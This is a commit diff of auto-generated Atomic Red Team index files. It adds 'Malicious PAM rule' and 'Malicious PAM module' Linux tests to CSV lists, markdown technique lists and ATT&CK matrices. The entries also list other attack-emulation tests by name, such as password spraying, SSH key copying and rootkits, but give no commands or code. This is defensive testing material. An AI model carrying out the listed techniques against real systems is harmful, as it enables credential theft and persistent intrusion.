Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]

CircleCI Atomic Red Team doc generator
2021-08-27 15:57:14 +00:00
parent 509d87ad1e
commit eb62bcd9fc
10 changed files with 440 additions and 17 deletions
+6
@@ -71,6 +71,8 @@ credential-access,T1110.003,Password Spraying,1,Password Spray all Domain Users,
credential-access,T1110.003,Password Spraying,2,Password Spray (DomainPasswordSpray),263ae743-515f-4786-ac7d-41ef3a0d4b2b,powershell
credential-access,T1110.003,Password Spraying,3,Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos),f14d956a-5b6e-4a93-847f-0c415142f07d,powershell
credential-access,T1110.003,Password Spraying,4,Password spray all Azure AD users with a single password,a8aa2d3e-1c52-4016-bc73-0f8854cfa80a,powershell
credential-access,T1556.003,Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh
credential-access,T1556.003,Pluggable Authentication Modules,2,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh
credential-access,T1552.004,Private Keys,1,Private Keys,520ce462-7ca7-441e-b5a5-f8347f632696,command_prompt
credential-access,T1552.004,Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh
credential-access,T1552.004,Private Keys,3,Copy Private SSH Keys with CP,7c247dc7-5128-4643-907b-73a76d9135c3,sh
@@ -447,6 +449,8 @@ defense-evasion,T1550.002,Pass the Hash,2,crackmapexec Pass the Hash,eb05b028-16
defense-evasion,T1550.003,Pass the Ticket,1,Mimikatz Kerberos Ticket Attack,dbf38128-7ba7-4776-bedf-cc2eed432098,command_prompt
defense-evasion,T1556.002,Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
defense-evasion,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
defense-evasion,T1556.003,Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh
defense-evasion,T1556.003,Pluggable Authentication Modules,2,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh
defense-evasion,T1055.012,Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
defense-evasion,T1055.012,Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
defense-evasion,T1055,Process Injection,1,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell
@@ -594,6 +598,8 @@ persistence,T1137.004,Outlook Home Page,1,Install Outlook Home Page Persistence,
persistence,T1556.002,Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
persistence,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
persistence,T1547.011,Plist Modification,1,Plist Modification,394a538e-09bb-4a4a-95d1-b93cf12682a8,manual
persistence,T1556.003,Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh
persistence,T1556.003,Pluggable Authentication Modules,2,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh
persistence,T1547.010,Port Monitors,1,Add Port Monitor persistence in Registry,d34ef297-f178-4462-871e-9ce618d44e50,command_prompt
persistence,T1546.013,PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell
persistence,T1037.004,RC Scripts,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
71 credential-access T1110.003 Password Spraying 2 Password Spray (DomainPasswordSpray) 263ae743-515f-4786-ac7d-41ef3a0d4b2b powershell
72 credential-access T1110.003 Password Spraying 3 Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos) f14d956a-5b6e-4a93-847f-0c415142f07d powershell
73 credential-access T1110.003 Password Spraying 4 Password spray all Azure AD users with a single password a8aa2d3e-1c52-4016-bc73-0f8854cfa80a powershell
74 credential-access T1556.003 Pluggable Authentication Modules 1 Malicious PAM rule 4b9dde80-ae22-44b1-a82a-644bf009eb9c sh
75 credential-access T1556.003 Pluggable Authentication Modules 2 Malicious PAM module 65208808-3125-4a2e-8389-a0a00e9ab326 sh
76 credential-access T1552.004 Private Keys 1 Private Keys 520ce462-7ca7-441e-b5a5-f8347f632696 command_prompt
77 credential-access T1552.004 Private Keys 2 Discover Private SSH Keys 46959285-906d-40fa-9437-5a439accd878 sh
78 credential-access T1552.004 Private Keys 3 Copy Private SSH Keys with CP 7c247dc7-5128-4643-907b-73a76d9135c3 sh
449 defense-evasion T1550.003 Pass the Ticket 1 Mimikatz Kerberos Ticket Attack dbf38128-7ba7-4776-bedf-cc2eed432098 command_prompt
450 defense-evasion T1556.002 Password Filter DLL 1 Install and Register Password Filter DLL a7961770-beb5-4134-9674-83d7e1fa865c powershell
451 defense-evasion T1574.009 Path Interception by Unquoted Path 1 Execution of program.exe as service with unquoted service path 2770dea7-c50f-457b-84c4-c40a47460d9f command_prompt
452 defense-evasion T1556.003 Pluggable Authentication Modules 1 Malicious PAM rule 4b9dde80-ae22-44b1-a82a-644bf009eb9c sh
453 defense-evasion T1556.003 Pluggable Authentication Modules 2 Malicious PAM module 65208808-3125-4a2e-8389-a0a00e9ab326 sh
454 defense-evasion T1055.012 Process Hollowing 1 Process Hollowing using PowerShell 562427b4-39ef-4e8c-af88-463a78e70b9c powershell
455 defense-evasion T1055.012 Process Hollowing 2 RunPE via VBA 3ad4a037-1598-4136-837c-4027e4fa319b powershell
456 defense-evasion T1055 Process Injection 1 Shellcode execution via VBA 1c91e740-1729-4329-b779-feba6e71d048 powershell
598 persistence T1556.002 Password Filter DLL 1 Install and Register Password Filter DLL a7961770-beb5-4134-9674-83d7e1fa865c powershell
599 persistence T1574.009 Path Interception by Unquoted Path 1 Execution of program.exe as service with unquoted service path 2770dea7-c50f-457b-84c4-c40a47460d9f command_prompt
600 persistence T1547.011 Plist Modification 1 Plist Modification 394a538e-09bb-4a4a-95d1-b93cf12682a8 manual
601 persistence T1556.003 Pluggable Authentication Modules 1 Malicious PAM rule 4b9dde80-ae22-44b1-a82a-644bf009eb9c sh
602 persistence T1556.003 Pluggable Authentication Modules 2 Malicious PAM module 65208808-3125-4a2e-8389-a0a00e9ab326 sh
603 persistence T1547.010 Port Monitors 1 Add Port Monitor persistence in Registry d34ef297-f178-4462-871e-9ce618d44e50 command_prompt
604 persistence T1546.013 PowerShell Profile 1 Append malicious start-process cmdlet 090e5aa5-32b6-473b-a49b-21e843a56896 powershell
605 persistence T1037.004 RC Scripts 1 rc.common 97a48daa-8bca-4bc0-b1a9-c1d163e762de bash
@@ -15,6 +15,8 @@ credential-access,T1056.001,Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2
credential-access,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-4951-a7c7-320889083b3e,bash
credential-access,T1110.001,Password Guessing,3,Brute Force Credentials of single Azure AD user,5a51ef57-299e-4d62-8e11-2d440df55e69,powershell
credential-access,T1110.003,Password Spraying,4,Password spray all Azure AD users with a single password,a8aa2d3e-1c52-4016-bc73-0f8854cfa80a,powershell
credential-access,T1556.003,Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh
credential-access,T1556.003,Pluggable Authentication Modules,2,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh
credential-access,T1552.004,Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh
credential-access,T1552.004,Private Keys,3,Copy Private SSH Keys with CP,7c247dc7-5128-4643-907b-73a76d9135c3,sh
credential-access,T1552.004,Private Keys,4,Copy Private SSH Keys with rsync,864bb0b2-6bb5-489a-b43b-a77b3a16d68a,sh
@@ -119,6 +121,8 @@ defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modificat
defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,9,chattr - Remove immutable file attribute,e7469fe2-ad41-4382-8965-99b94dd3c13f,sh
defense-evasion,T1036.005,Match Legitimate Name or Location,1,Execute a process from a directory masquerading as the current parent directory.,812c3ab8-94b0-4698-a9bf-9420af23ce24,sh
defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script,f45df6be-2e1e-4136-a384-8f18ab3826fb,sh
defense-evasion,T1556.003,Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh
defense-evasion,T1556.003,Pluggable Authentication Modules,2,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh
defense-evasion,T1036.003,Rename System Utilities,2,Masquerading as Linux crond process.,a315bfff-7a98-403b-b442-2ea1b255e556,sh
defense-evasion,T1014,Rootkit,1,Loadable Kernel Module based Rootkit,dfb50072-e45a-4c75-a17e-a484809c8553,sh
defense-evasion,T1014,Rootkit,2,Loadable Kernel Module based Rootkit,75483ef8-f10f-444a-bf02-62eb0e48db6f,sh
@@ -198,6 +202,8 @@ persistence,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD
persistence,T1547.006,Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash
persistence,T1136.001,Local Account,1,Create a user account on a Linux system,40d8eabd-e394-46f6-8785-b9bfa1d011d2,bash
persistence,T1136.001,Local Account,5,Create a new user in Linux with `root` UID and GID.,a1040a30-d28b-4eda-bd99-bb2861a4616c,bash
persistence,T1556.003,Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh
persistence,T1556.003,Pluggable Authentication Modules,2,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh
persistence,T1037.004,RC Scripts,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash
persistence,T1037.004,RC Scripts,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash
persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,bash
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
15 credential-access T1040 Network Sniffing 1 Packet Capture Linux 7fe741f7-b265-4951-a7c7-320889083b3e bash
16 credential-access T1110.001 Password Guessing 3 Brute Force Credentials of single Azure AD user 5a51ef57-299e-4d62-8e11-2d440df55e69 powershell
17 credential-access T1110.003 Password Spraying 4 Password spray all Azure AD users with a single password a8aa2d3e-1c52-4016-bc73-0f8854cfa80a powershell
18 credential-access T1556.003 Pluggable Authentication Modules 1 Malicious PAM rule 4b9dde80-ae22-44b1-a82a-644bf009eb9c sh
19 credential-access T1556.003 Pluggable Authentication Modules 2 Malicious PAM module 65208808-3125-4a2e-8389-a0a00e9ab326 sh
20 credential-access T1552.004 Private Keys 2 Discover Private SSH Keys 46959285-906d-40fa-9437-5a439accd878 sh
21 credential-access T1552.004 Private Keys 3 Copy Private SSH Keys with CP 7c247dc7-5128-4643-907b-73a76d9135c3 sh
22 credential-access T1552.004 Private Keys 4 Copy Private SSH Keys with rsync 864bb0b2-6bb5-489a-b43b-a77b3a16d68a sh
121 defense-evasion T1222.002 Linux and Mac File and Directory Permissions Modification 9 chattr - Remove immutable file attribute e7469fe2-ad41-4382-8965-99b94dd3c13f sh
122 defense-evasion T1036.005 Match Legitimate Name or Location 1 Execute a process from a directory masquerading as the current parent directory. 812c3ab8-94b0-4698-a9bf-9420af23ce24 sh
123 defense-evasion T1027 Obfuscated Files or Information 1 Decode base64 Data into Script f45df6be-2e1e-4136-a384-8f18ab3826fb sh
124 defense-evasion T1556.003 Pluggable Authentication Modules 1 Malicious PAM rule 4b9dde80-ae22-44b1-a82a-644bf009eb9c sh
125 defense-evasion T1556.003 Pluggable Authentication Modules 2 Malicious PAM module 65208808-3125-4a2e-8389-a0a00e9ab326 sh
126 defense-evasion T1036.003 Rename System Utilities 2 Masquerading as Linux crond process. a315bfff-7a98-403b-b442-2ea1b255e556 sh
127 defense-evasion T1014 Rootkit 1 Loadable Kernel Module based Rootkit dfb50072-e45a-4c75-a17e-a484809c8553 sh
128 defense-evasion T1014 Rootkit 2 Loadable Kernel Module based Rootkit 75483ef8-f10f-444a-bf02-62eb0e48db6f sh
202 persistence T1547.006 Kernel Modules and Extensions 1 Linux - Load Kernel Module via insmod 687dcb93-9656-4853-9c36-9977315e9d23 bash
203 persistence T1136.001 Local Account 1 Create a user account on a Linux system 40d8eabd-e394-46f6-8785-b9bfa1d011d2 bash
204 persistence T1136.001 Local Account 5 Create a new user in Linux with `root` UID and GID. a1040a30-d28b-4eda-bd99-bb2861a4616c bash
205 persistence T1556.003 Pluggable Authentication Modules 1 Malicious PAM rule 4b9dde80-ae22-44b1-a82a-644bf009eb9c sh
206 persistence T1556.003 Pluggable Authentication Modules 2 Malicious PAM module 65208808-3125-4a2e-8389-a0a00e9ab326 sh
207 persistence T1037.004 RC Scripts 2 rc.common c33f3d80-5f04-419b-a13a-854d1cbdbf3a bash
208 persistence T1037.004 RC Scripts 3 rc.local 126f71af-e1c9-405c-94ef-26a47b16c102 bash
209 persistence T1098.004 SSH Authorized Keys 1 Modify SSH Authorized Keys 342cc723-127c-4d3a-8292-9c0c6b4ecadc bash
+9 -3
@@ -112,7 +112,9 @@
- Atomic Test #2: Password Spray (DomainPasswordSpray) [windows]
- Atomic Test #3: Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos) [windows]
- Atomic Test #4: Password spray all Azure AD users with a single password [azure-ad]
- T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1556.003 Pluggable Authentication Modules](../../T1556.003/T1556.003.md)
- Atomic Test #1: Malicious PAM rule [linux]
- Atomic Test #2: Malicious PAM module [linux]
- [T1552.004 Private Keys](../../T1552.004/T1552.004.md)
- Atomic Test #1: Private Keys [windows]
- Atomic Test #2: Discover Private SSH Keys [macos, linux]
@@ -740,7 +742,9 @@
- T1574.008 Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1574.009 Path Interception by Unquoted Path](../../T1574.009/T1574.009.md)
- Atomic Test #1: Execution of program.exe as service with unquoted service path [windows]
- T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1556.003 Pluggable Authentication Modules](../../T1556.003/T1556.003.md)
- Atomic Test #1: Malicious PAM rule [linux]
- Atomic Test #2: Malicious PAM module [linux]
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.002 Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -1018,7 +1022,9 @@
- Atomic Test #1: Execution of program.exe as service with unquoted service path [windows]
- [T1547.011 Plist Modification](../../T1547.011/T1547.011.md)
- Atomic Test #1: Plist Modification [macos]
- T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1556.003 Pluggable Authentication Modules](../../T1556.003/T1556.003.md)
- Atomic Test #1: Malicious PAM rule [linux]
- Atomic Test #2: Malicious PAM module [linux]
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1547.010 Port Monitors](../../T1547.010/T1547.010.md)
- Atomic Test #1: Add Port Monitor persistence in Registry [windows]
@@ -39,7 +39,9 @@
- T1555.005 Password Managers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1110.003 Password Spraying](../../T1110.003/T1110.003.md)
- Atomic Test #4: Password spray all Azure AD users with a single password [azure-ad]
- T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1556.003 Pluggable Authentication Modules](../../T1556.003/T1556.003.md)
- Atomic Test #1: Malicious PAM rule [linux]
- Atomic Test #2: Malicious PAM module [linux]
- [T1552.004 Private Keys](../../T1552.004/T1552.004.md)
- Atomic Test #2: Discover Private SSH Keys [macos, linux]
- Atomic Test #3: Copy Private SSH Keys with CP [linux]
@@ -275,7 +277,9 @@
- [T1027 Obfuscated Files or Information](../../T1027/T1027.md)
- Atomic Test #1: Decode base64 Data into Script [macos, linux]
- T1601.001 Patch System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1556.003 Pluggable Authentication Modules](../../T1556.003/T1556.003.md)
- Atomic Test #1: Malicious PAM rule [linux]
- Atomic Test #2: Malicious PAM module [linux]
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.009 Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -489,7 +493,9 @@
- T1137.003 Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1137.004 Outlook Home Page [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1556.003 Pluggable Authentication Modules](../../T1556.003/T1556.003.md)
- Atomic Test #1: Malicious PAM rule [linux]
- Atomic Test #2: Malicious PAM module [linux]
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1037.004 RC Scripts](../../T1037.004/T1037.004.md)
+3 -3
@@ -24,7 +24,7 @@
| | [Unix Shell](../../T1059.004/T1059.004.md) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Guessing](../../T1110.001/T1110.001.md) | [Process Discovery](../../T1057/T1057.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Managers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [RC Scripts](../../T1037.004/T1037.004.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Spraying](../../T1110.003/T1110.003.md) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | Network Device Configuration Dump [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Stop [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Downgrade System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Downgrade System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | Software Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | Implant Internal Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | [Private Keys](../../T1552.004/T1552.004.md) | [System Checks](../../T1497.001/T1497.001.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
| | | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Proc Filesystem](../../T1003.007/T1003.007.md) | [System Information Discovery](../../T1082/T1082.md) | | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | [Local Account](../../T1136.001/T1136.001.md) | [Systemd Service](../../T1543.002/T1543.002.md) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SAML Tokens [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | System Location Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Screen Capture](../../T1113/T1113.md) | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
@@ -37,7 +37,7 @@
| | | Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Remote Access Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | Outlook Home Page [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Impair Command History Logging](../../T1562.003/T1562.003.md) | | | | | | [Standard Encoding](../../T1132.001/T1132.001.md) | |
| | | Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Indicator Blocking](../../T1562.006/T1562.006.md) | | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | [Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | | [Indicator Blocking](../../T1562.006/T1562.006.md) | | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Indicator Removal on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | |
| | | [RC Scripts](../../T1037.004/T1037.004.md) | | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
@@ -54,7 +54,7 @@
| | | Transport Agent [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | [Trap](../../T1546.005/T1546.005.md) | | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | | |
| | | [Unix Shell Configuration Modification](../../T1546.004/T1546.004.md) | | Patch System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | | | | | | | |
| | | Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | XDG Autostart Entries [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | | | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
+3 -3
@@ -41,7 +41,7 @@
| | [Windows Management Instrumentation](../../T1047/T1047.md) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Guessing](../../T1110.001/T1110.001.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Managers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | [Web Protocols](../../T1071.001/T1071.001.md) | |
| | | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Spraying](../../T1110.003/T1110.003.md) | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | [External Remote Services](../../T1133/T1133.md) | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | [External Remote Services](../../T1133/T1133.md) | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | | | | | | |
| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Downgrade System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Private Keys](../../T1552.004/T1552.004.md) | | | | | | |
| | | Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Proc Filesystem](../../T1003.007/T1003.007.md) | | | | | | |
| | | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | SAML Tokens [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
@@ -72,7 +72,7 @@
| | | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [RC Scripts](../../T1037.004/T1037.004.md) | [InstallUtil](../../T1218.004/T1218.004.md) | | | | | | | |
| | | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | [Re-opened Applications](../../T1547.007/T1547.007.md) | Invalid Code Signature [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
| | | [Plist Modification](../../T1547.011/T1547.011.md) | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | LC_MAIN Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
